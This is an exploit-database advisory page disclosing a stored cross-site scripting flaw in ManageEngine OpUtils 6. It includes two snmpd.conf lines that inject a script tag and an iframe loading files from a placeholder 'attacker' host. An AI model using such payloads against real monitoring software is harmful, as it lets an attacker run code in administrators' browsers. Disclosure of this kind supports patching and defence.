header-logo
Suggest Exploit
vendor:
OpUtils
by:
loneferret
4,3
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: OpUtils
Affected Version From: 6
Affected Version To: 6
Patch Exists: NO
Related CWE: N/A
CPE: a:manageengine:oputils
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2013

ManageEngine OpUtils XSS Vulnerability

The XSS vulnerability is triggered by configuring a snmpd.conf file to point to an attacker-controlled JavaScript file. When a SNMP Scan is initiated, the attacker is presented with a couple of alert boxes.

Mitigation:

Ensure that the snmpd.conf file is not pointing to an attacker-controlled JavaScript file.
Source

Exploit-DB raw data:

# Author: loneferret of Offensive Security
# Product: ManageEngine OpUtils
# Version: 6
# Vendor Site: http://www.manageengine.com
# Software Download: http://www.manageengine.com/products/oputils/download.html

# Software Description:
# http://www.manageengine.com/products/oputils/oputils.html
# The toolset can be used to troubleshoot the frequent network problems such as network 
# connectivity, availability, performance, health, and latency of any IP node in the network. 
# It provides desktop details like CPU, Disk space information, installed software, 
# process information and other vital metrics. Readymade tools to manage DNS names, 
# IP and MAC addresses are also available. SNMP tools are included to help monitor 
# any SNMP-enabled IP node. Graphs, charts, and tables offer real-time views of 
# the network and system information. Results can be exported as reports in various 
# formats like PDF and HTML.

# Vulnerability:
# The XSS is triggered by configuring a snmpd.conf file to point to an attacker-controlled
# JavaScript file
# ..
# syslocation <script src="http://attacker/xss.js"></script>
# syscontact <iframe src="http://attacker/something.html"></iframe>

# 
# Adding the target machine either via a network scan or manually by adding the IP to the host list 
# ManageEngine monitors. When a SNMP Scan is initiated, we are presented with a couple of 
# nice alert boxes.
#